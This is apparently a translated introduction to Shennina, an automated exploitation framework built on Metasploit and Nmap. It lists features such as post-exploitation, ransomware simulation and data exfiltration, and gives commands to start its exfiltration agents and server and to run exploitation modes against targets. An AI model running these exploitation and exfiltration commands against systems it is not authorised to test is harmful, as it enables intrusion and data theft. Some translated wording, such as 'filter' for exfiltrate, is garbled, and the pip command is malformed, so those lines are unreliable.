Shennina is a powerful automated host penetration/vulnerability exploitation framework. The main purpose of this project is to achieve complete automation of security scanning, vulnerability scanning/analysis, and vulnerability exploitation development using artificial intelligence technology. Shennina integrates the powerful network security tools Metasploit and Nmap to implement some of its functions and perform penetration testing. In addition, the tool also integrates a command control server to automatically filter data from the target host.
Function Introduction:
- Implements an automated self-learning method to find vulnerability exploitation solutions.
- Uses hosted concurrent design to achieve high-performance operation.
- Intelligent cluster penetration testing/vulnerability exploitation.
- Post-exploitation functionality.
- Deception attack detection.
- Ransomware simulation functionality.
- Automatic data filtering.
- Optional vulnerability scanning mode.
- Heuristic mode to obtain recommended penetration testing solutions.
- Supports Windows, Linux, and macOS proxies.
- Scripted attack/penetration mode in the post-exploitation phase.
- Provides kernel-based vulnerability exploitation/penetration solution recommendations.
- Provides out-of-band technology testing for vulnerability exploitation solutions.
- Automatically filters important data from the target server.
- Report generation.
- Covers 40+ TTPs in the MITRE ATT&CK framework.
- Supports multiple input targets.
Tool Download:
Since this tool is developed based on Python, we first need to install and configure the Python environment on our local device. Next, we can use the following command to clone the source code of the project to our local machine:
git clone https://github.com/mazen160/shennina.git
Then, use the pip command and the requirements.txt file provided by the project to install the required dependencies for the tool:
cd Shennina
pip install requirements.txt
Alternatively, we can also directly access the Release page of the project to download the latest released version of the tool.
Tool Execution:
Exfiltration Server - Agent
Linux/macOS
./exfiltration-server/agent.sh
Windows
./exfiltration-server/agent.ps1
Exfiltration Server - Run
$ cd ./exfiltration-server/
$ ./run-server.sh
MSFRPCD Server
./scripts/run-msfrp.py
Run Service Scan
$ ./shennina.py --lhost metasploit-ip --target target.local --service-scan-only
Run Shennina in Training Mode
$ ./shennina.py --training-mode --lhost lhost.local --target training-target.local
Exploitation Mode
$ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode
Exploitation Mode - Heuristic
$ ./shennina.py --lhost lhost.local --target target.local --exploitation-mode --secondary-mode
Project Address:
Shennina: https://github.com/mazen160/shennina